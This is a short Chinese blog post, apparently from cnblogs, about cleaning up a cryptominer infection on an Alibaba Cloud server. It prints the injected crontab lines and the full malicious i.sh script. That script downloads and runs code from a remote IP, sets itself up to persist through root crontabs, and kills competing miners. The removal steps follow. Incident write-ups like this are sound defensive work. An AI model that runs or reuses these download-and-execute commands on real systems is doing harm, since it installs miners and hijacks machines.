zoukankan      html  css  js  c++  java
  • 阿里云主机遭受挖矿程序攻击

    crontab里被注入这样2行

    */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
    */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

    查看i.sh内容

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    
    echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
    echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
    echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.2021" ]; then
        curl -fsSL http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021
    fi
    
    if [ ! -f "/tmp/ddg.2021" ]; then
        wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021
    fi
    
    chmod +x /tmp/ddg.2021 && /tmp/ddg.2021
    
    
    if [ ! -f "/tmp/imWBR1" ]; then
        curl -fsSL http://218.248.40.228:8443/imWBR1 -o /tmp/imWBR1 --compressed
    fi
    
    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
    #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
    #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

    分析之后就很明显了,

    确认,删除crontab内容

    /var/spool/cron/root
    /var/spool/cron/crontabs/root

    crontab -e

    删除程序

    /tmp/ddg.2021
    /tmp/imWBR1
  • 相关阅读:
    有7g和2g的砝码各一个,怎样称可以3次把140g东西分为50g和90g???????
    中缀到后缀(一个例子)
    动态代理模式的使用
    代理模式用来初始化的延迟下载
    ReentrantLock Condition 实现消费者生产者问题
    Two Sum
    [leetcode]重建二叉树(先序和终须) 中序遍和后续
    (转载)旋转数组查找 最简洁方法 总结
    [不明觉厉] 下一个排列
    codeforces -- 283A
  • 原文地址:https://www.cnblogs.com/goozgk/p/8284389.html
Copyright © 2011-2022 走看看